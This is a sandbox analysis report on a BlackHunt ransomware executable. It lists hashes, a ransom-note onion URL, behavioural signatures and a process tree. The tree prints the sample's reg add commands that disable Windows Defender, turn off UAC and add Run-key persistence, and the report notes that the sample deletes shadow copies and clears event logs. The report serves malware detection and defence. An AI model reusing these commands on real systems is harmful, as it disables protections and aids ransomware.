Analysis
-
max time kernel
243s -
max time network
295s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:09
Static task
static1
Behavioral task
behavioral1
Sample
911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe
Resource
win10v2004-20231222-en
General
-
Target
911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe
-
Size
707KB
-
MD5
2fb764808fc5cc0aa920d07a5a77a6fc
-
SHA1
679c4271f0d0a23830fc6796b46a0b24e46dce5a
-
SHA256
911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf
-
SHA512
807fcd350a781eded888eeca2de300b816c6bfcd4bc3051578d97be582579ec1e58504b8da0930e27794d431fb98a5761ff73528935da60586b69ac36352eb41
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza188qvnh:6uaTmkZJ+naie5OTamgEoKxLWPkh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2340 fsutil.exe 1860 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2012 wevtutil.exe 2412 wevtutil.exe 1944 wevtutil.exe 1000 wevtutil.exe 2184 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2300 bcdedit.exe 2656 bcdedit.exe 2016 bcdedit.exe 1868 bcdedit.exe -
pid Process 2464 wbadmin.exe 2744 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\M: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Y: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\L: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\X: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\B: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\Q: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\R: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\U: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\H: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\N: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\E: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\Z: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\P: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\O: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\T: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\J: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\I: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\A: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\K: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\V: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File opened (read-only) \??\S: 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe -
Drops file in Program Files directory 39 IoCs
description ioc Process File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.hta 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_Private.key 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2840 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2036 vssadmin.exe 2168 vssadmin.exe 2116 vssadmin.exe 936 vssadmin.exe 2272 vssadmin.exe 1536 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeRestorePrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeBackupPrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeTakeOwnershipPrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeAuditPrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeSecurityPrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeIncBasePriorityPrivilege 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Token: SeBackupPrivilege 684 vssvc.exe Token: SeRestorePrivilege 684 vssvc.exe Token: SeAuditPrivilege 684 vssvc.exe Token: SeBackupPrivilege 1772 wbengine.exe Token: SeRestorePrivilege 1772 wbengine.exe Token: SeSecurityPrivilege 1772 wbengine.exe Token: SeSecurityPrivilege 2184 wevtutil.exe Token: SeSecurityPrivilege 2012 wevtutil.exe Token: SeBackupPrivilege 2184 wevtutil.exe Token: SeBackupPrivilege 2012 wevtutil.exe Token: SeSecurityPrivilege 2412 wevtutil.exe Token: SeBackupPrivilege 2412 wevtutil.exe Token: SeSecurityPrivilege 1000 wevtutil.exe Token: SeBackupPrivilege 1000 wevtutil.exe Token: SeSecurityPrivilege 1944 wevtutil.exe Token: SeBackupPrivilege 1944 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1960 wrote to memory of 1992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 28 PID 1960 wrote to memory of 1992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 28 PID 1960 wrote to memory of 1992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 28 PID 1960 wrote to memory of 1992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 28 PID 1960 wrote to memory of 592 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 30 PID 1960 wrote to memory of 592 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 30 PID 1960 wrote to memory of 592 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 30 PID 1960 wrote to memory of 592 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 30 PID 1960 wrote to memory of 528 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 32 PID 1960 wrote to memory of 528 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 32 PID 1960 wrote to memory of 528 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 32 PID 1960 wrote to memory of 528 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 32 PID 1960 wrote to memory of 992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 33 PID 1960 wrote to memory of 992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 33 PID 1960 wrote to memory of 992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 33 PID 1960 wrote to memory of 992 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 33 PID 1992 wrote to memory of 880 1992 cmd.exe 36 PID 1992 wrote to memory of 880 1992 cmd.exe 36 PID 1992 wrote to memory of 880 1992 cmd.exe 36 PID 1960 wrote to memory of 2284 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 37 PID 1960 wrote to memory of 2284 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 37 PID 1960 wrote to memory of 2284 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 37 PID 1960 wrote to memory of 2284 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 37 PID 592 wrote to memory of 2472 592 cmd.exe 39 PID 592 wrote to memory of 2472 592 cmd.exe 39 PID 592 wrote to memory of 2472 592 cmd.exe 39 PID 1960 wrote to memory of 1304 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 40 PID 1960 wrote to memory of 1304 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 40 PID 1960 wrote to memory of 1304 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 40 PID 1960 wrote to memory of 1304 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 40 PID 1960 wrote to memory of 1496 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 41 PID 1960 wrote to memory of 1496 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 41 PID 1960 wrote to memory of 1496 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 41 PID 1960 wrote to memory of 1496 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 41 PID 1960 wrote to memory of 2172 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 43 PID 1960 wrote to memory of 2172 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 43 PID 1960 wrote to memory of 2172 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 43 PID 1960 wrote to memory of 2172 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 43 PID 1960 wrote to memory of 2488 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 45 PID 1960 wrote to memory of 2488 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 45 PID 1960 wrote to memory of 2488 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 45 PID 1960 wrote to memory of 2488 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 45 PID 528 wrote to memory of 2300 528 cmd.exe 47 PID 528 wrote to memory of 2300 528 cmd.exe 47 PID 528 wrote to memory of 2300 528 cmd.exe 47 PID 1960 wrote to memory of 1544 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 48 PID 1960 wrote to memory of 1544 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 48 PID 1960 wrote to memory of 1544 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 48 PID 1960 wrote to memory of 1544 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 48 PID 1960 wrote to memory of 1300 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 50 PID 1960 wrote to memory of 1300 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 50 PID 1960 wrote to memory of 1300 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 50 PID 1960 wrote to memory of 1300 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 50 PID 992 wrote to memory of 1760 992 cmd.exe 51 PID 992 wrote to memory of 1760 992 cmd.exe 51 PID 992 wrote to memory of 1760 992 cmd.exe 51 PID 1960 wrote to memory of 1936 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 52 PID 1960 wrote to memory of 1936 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 52 PID 1960 wrote to memory of 1936 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 52 PID 1960 wrote to memory of 1936 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 52 PID 1960 wrote to memory of 2348 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 53 PID 1960 wrote to memory of 2348 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 53 PID 1960 wrote to memory of 2348 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 53 PID 1960 wrote to memory of 2348 1960 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe 53 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe"C:\Users\Admin\AppData\Local\Temp\911242dce58ca9583045fd61e4a49fff8e42c5ca0718d04f8441bf153b96eedf.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1960 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2172
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2900
-
-
-
